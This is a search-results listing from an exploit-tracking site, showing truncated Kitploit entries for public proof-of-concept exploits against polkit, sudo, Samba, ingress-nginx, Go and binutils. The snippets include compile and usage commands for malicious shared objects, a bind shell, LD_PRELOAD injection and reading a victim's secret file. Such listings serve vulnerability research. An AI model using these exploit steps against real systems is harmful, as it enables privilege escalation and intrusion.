Lucene search
+L

629 matches found

Kitploit
Kitploit
added 2026/09/13 3:03 p.m.5 views

CVE-2021-4034

Proof of Concept PoC: CVE-2021-4034 PwnKit Note: This repository and its content are part of a Final Degree Project FDP, created solely for educational purposes and academic research. Description This repository contains a proof of concept PoC for the CVE-2021-4034 vulnerability, also known as...

7.8CVSS7AI score0.94921EPSS
SaveExploits155
Kitploit
Kitploit
added 2026/09/13 2:21 p.m.7 views

POC-IngressNightmare-CVE-2025-1974

POC de IngressNightmare CVE-2025-1974 Desarrollado a partir de: https://github.com/yoshino-s/CVE-2025-1974 https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities Hablar es barato, solo mira el código. Los detalles se pueden encontrar en...

9.8CVSS7.2AI score0.99525EPSS
SaveExploits20References1
Kitploit
Kitploit
added 2026/09/13 2:12 p.m.9 views

CVE-2021-20294-POC

CVE-2021-20294-POC Jan 21 2023, Altin tin-z, github.com/tin-z Poc download and compile root@kitploit: wget https://ftp.gnu.org/gnu/binutils/binutils-2.35.tar.gz && tar -xzvf binutils-2.35.tar.gz cd binutils-2.35 && ./configure && make && cd .. gcc -shared -fPIC poc.c -o poc.so...

7.8CVSS7AI score0.03278EPSS
SaveExploits2References1
Kitploit
Kitploit
added 2026/09/13 11:58 a.m.7 views

CVE-2017-7494_SambaCry

CVE-2017-7494 SambaCry Exploit Exploit SambaCry CVE-2017-7494 para explotar Samba bind shell sin Metasploit Si necesita cambiar el puerto, basta con cambiar la línea n.º 68 de bindshell-samba.c y recompilar: root@kitploit: gcc -c -fpic bindshell-samba.c root@kitploit: gcc -shared -o...

10CVSS7.9AI score0.99448EPSS
SaveExploits26
Kitploit
Kitploit
added 2026/09/13 11:03 a.m.6 views

CVE-2021-3156

CVE-2021-3156 PoC Introduction This is an exploit for the CVE-2021-3156 sudo vulnerability dubbed Baron Samedit by Qualys. Usage build: root@kitploit: $ make list targets: root@kitploit: $ ./sudo-hax-me-a-sandwich run: root@kitploit: $ ./sudo-hax-me-a-sandwich manual mode: root@kitploit: $...

7.8CVSS7.4AI score0.99969EPSS
SaveExploits83
Kitploit
Kitploit
added 2026/09/13 9:54 a.m.6 views

CVE-2019-18276

To exploit the CVE-2019-18276 vulnerability, open this directory in a terminal and run the commands: cd ./demonstration ./make The commands to type in the virtual machine are: ./creationsecret.sh hacker ./exploit.sh 1000 enable -f ./libpwn.so asd cat /home/victime/.secret.txt...

7.8CVSS7.3AI score0.02608EPSS
SaveExploits5
Kitploit
Kitploit
added 2026/09/13 9:46 a.m.6 views

CVE-2025-32463_PoC

CVE-2025-32463 NVD CVE-2025-32463 En la mayoría de los casos, GCC no está instalado por defecto en los servidores objetivo. Esta prueba de concepto proporciona una versión precompilada para garantizar que se pueda ejecutar de inmediato en los sistemas afectados. Uso 1. Compila el archivo...

9.3CVSS7.6AI score0.59417EPSS
SaveExploits71
Kitploit
Kitploit
added 2026/09/13 7:58 a.m.5 views

IngressNightterror

IngressNightterror CVE-2025-1974 Overview This repository is my research on IngressNightmare vulnerability. It includes a vulnerable Ingress deploy files, exploit itself and shared object payload. CVE The list of CVE indexes: CVE-2025-1974 - Root vulnerability CVE-2025-24514 - auth-url annotation...

9.8CVSS7.2AI score0.99525EPSS
SaveExploits21References3
Kitploit
Kitploit
added 2026/09/13 3:44 a.m.6 views

CVE-2024-48990

CVE-2024-48990 hello this is 0x3bs In victim machine: root@kitploit: set -e cd /tmp 1. Create the malicious module directory structure mkdir -p malicious/importlib in attacker machine to compile lib.c in attacker machine : root@kitploit: gcc -shared -fPIC -o exp.so lib.c and in vivtim machine : i...

7.8CVSS7.8AI score0.20452EPSS
SaveExploits16
Kitploit
Kitploit
added 2026/09/13 2:55 a.m.7 views

CVE-2018-6574

CVE-2018-6574 POC Exploit POC For CVE-2018-6574 Compile 1. Create an exploit file with the following: root@kitploit: include include static void malicious attributeconstructor; void malicious system"COMMAND"; 2. Compile it: root@kitploit: gcc -shared -o exploit.so -fPIC exploit.c 3. Finally, you...

7.8CVSS7.1AI score0.07625EPSS
SaveExploits4
Kitploit
Kitploit
added 2026/09/12 8:46 p.m.8 views

CVE-2017-7494

SambaCry CVE-2017-7494 Exploit CVE-2017-7494/SambaCry allows authenticated users to upload a shared library to a writeable folder, and perform execution attack using the upload libraries. Vulnerability explanation SambaCry is a path-validation vulnerability in how Samba handles named-pipe request...

10CVSS7.9AI score0.99448EPSS
SaveExploits26References1
Kitploit
Kitploit
added 2026/09/12 8:31 p.m.5 views

CVE-2018-6574-go-get-RCE

CVE-2018-6574-Solution gcc -shared -o attack.so -fPIC attack.c...

7.8CVSS7AI score0.07625EPSS
SaveExploits4
Kitploit
Kitploit
added 2026/09/12 7:09 p.m.8 views

pwnkit

CVE-2021-4034 Introduction This is an exploit for the CVE-2021-4034 vulnerability, aka pwnkit, which was discovered by Qualys. Usage Compilation root@kitploit: $ make or root@kitploit: $ gcc -o pwnkit.so -fPIC -shared pwnkit.c -Wl,-e,main Testing root@kitploit: $ make test or root@kitploit: $...

7.8CVSS7.1AI score0.94921EPSS
SaveExploits155
Kitploit
Kitploit
added 2026/09/12 6:05 p.m.7 views

CVE-2023-1521

PoC root@kitploit: gcc -shared -o libpoc.so poc.c -fPIC export LDPRELOAD=fullpathtolibpoc.so sccache gcc foo.c -o foo...

7.8CVSS5.8AI score0.0036EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/12 4:30 p.m.4 views

sudo-chroot-CVE-2025-32463

DISCLAIMER This code is for educational and research purposes only. Do not use it on systems you do not own or have permission to test. The author is not responsible for any misuse, damage, or legal consequences resulting from the use of this code. sudo chroot PrivEsc PoC CVE-2025-32463 This is a...

9.3CVSS7.5AI score0.59417EPSS
SaveExploits71
Kitploit
Kitploit
added 2026/09/12 2:34 p.m.8 views

xwiki__xwiki-commons_CVE-2022-24897_12-6-6

XWiki Commons XWiki Commons are technical libraries common to several other top level XWiki projects. These libraries can be used by projects outside of the XWiki ecosystem, are generic and not related to the wiki domain. XWiki Platform, XWiki Commons and XWiki Rendering are part of the XWiki.org...

7.5CVSS7.4AI score0.01526EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/12 2:27 p.m.11 views

CVE-2009-5147

CVE-2009-5147 and CVE-2015-7551 PoC to run it: root@kitploit: make foo export FOO=./foo.so ruby -v foo.rb with different versions of ruby you should get different results: root@kitploit: vpereira@kimura:/poc rvm use 2.1.7 vpereira@kimura:/poc ruby -v foo.rb ruby 2.1.7p400 2015-08-18 revision 5163...

8.4CVSS6.7AI score0.07766EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/12 5:45 a.m.10 views

linux_injector

linuxinjector A simple ptrace-less shared library injector for x64 Linux. Usage linuxinjector mode 1. normal dlopen 2. memfd + dlopen for injecting into containers 3. raw shellcode pid Target process id. Must have ptrace rights to it required for accessing /proc/$pid/mem. Not ptraced, so another...

5.9AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/12 4:40 a.m.5 views

pwnkit

CVE-2021-4034 Introduction This is an exploit for the CVE-2021-4034 vulnerability, aka pwnkit, which was discovered by Qualys. Usage Compilation root@kitploit: $ make or root@kitploit: $ gcc -o pwnkit.so -fPIC -shared pwnkit.c -Wl,-e,main Testing root@kitploit: $ make test or root@kitploit: $...

7.8CVSS7.1AI score0.94921EPSS
SaveExploits155
Kitploit
Kitploit
added 2026/09/11 8:14 p.m.6 views

cve-2018-6574-exploit

cve-2018-6574-exploit root@kitploit: gcc -shared -o attack.so -fPIC attack.c go get github.com/zerbaliy3v/cve-2018-6574-exploit...

7.8CVSS7.1AI score0.07625EPSS
SaveExploits4
Rows per page
Query Builder